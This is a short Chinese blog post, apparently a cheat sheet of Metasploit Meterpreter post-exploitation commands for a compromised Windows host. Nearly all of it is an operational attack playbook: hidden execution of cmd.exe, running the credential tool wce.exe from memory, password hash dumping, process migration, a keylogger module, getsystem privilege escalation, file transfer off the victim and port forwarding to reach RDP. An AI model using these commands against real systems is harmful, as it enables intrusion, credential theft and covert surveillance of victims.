乱 - Metasploit shell 命令

Metasploit Shell

获取Metasploit shell后
background  //隐藏窗口;
sessions   // 查看shell id
session -i id   //切换回shell窗口
quit          //退出
shell         //Windows Cmd
irb         
client.sys.config.sysinfo() 

cat c:\\1.txt   路径
getwd           //获取shell机器的当前路径
getlwd          //获取本机当前工作路径    

upload x48d.exe c:\\  上传本地文件
download c:\\1.txt /root/1.txt 下载到本地文件
edit          //编辑文件
search -d c:\\ -f *.txt 搜索指定文件

ipconfig
portfwd  -h //内置类NC
portfwd add -l 1234 -p 3389 -r 192.168.1.1 
rdesktop //linux 远程连接
rdesktop -u user -p pass 1234 192.168.1.1:123

migrate * 进程转移到另一个进程的内存空间,ie溢出的会话 寄存在iE内存空间中,如果关闭浏览器
会话将会终止。

execute  //执行目标机上文件
execute -H -f cmd.exe 隐藏执行cmd.exe程序
execute -H -i -f cmd.exe 交互执行
execute -H -m -d calc.exe -f wce.exe -a "-o foo.txt" // 直接从内存中执行攻击端的可执行文件、

getpid    //获取当前进程pid
kill      //关闭进程
getuid    //获取当前会话的用户名
sysinfo   // 获取目标系统一些系统
shutdown  //关机

hashdump 导出账号HASH

show targets   //选择对方系统配置环境;
info           //查看exp支持的系统,配置参数,介绍
set 和 unset
save

在拥有metasplot shell状态下
screenshot      //截屏
sysinfo         //获取目标运行平台
//键盘记录
ps  ->  migrate  id->   //将进程迁移到指定进程
run post/windows/capture/keylog_recorder  启动键盘记录模块
//提权
use priv 加载priv扩展  
getsystem  // 提权

91

标签: none

添加新评论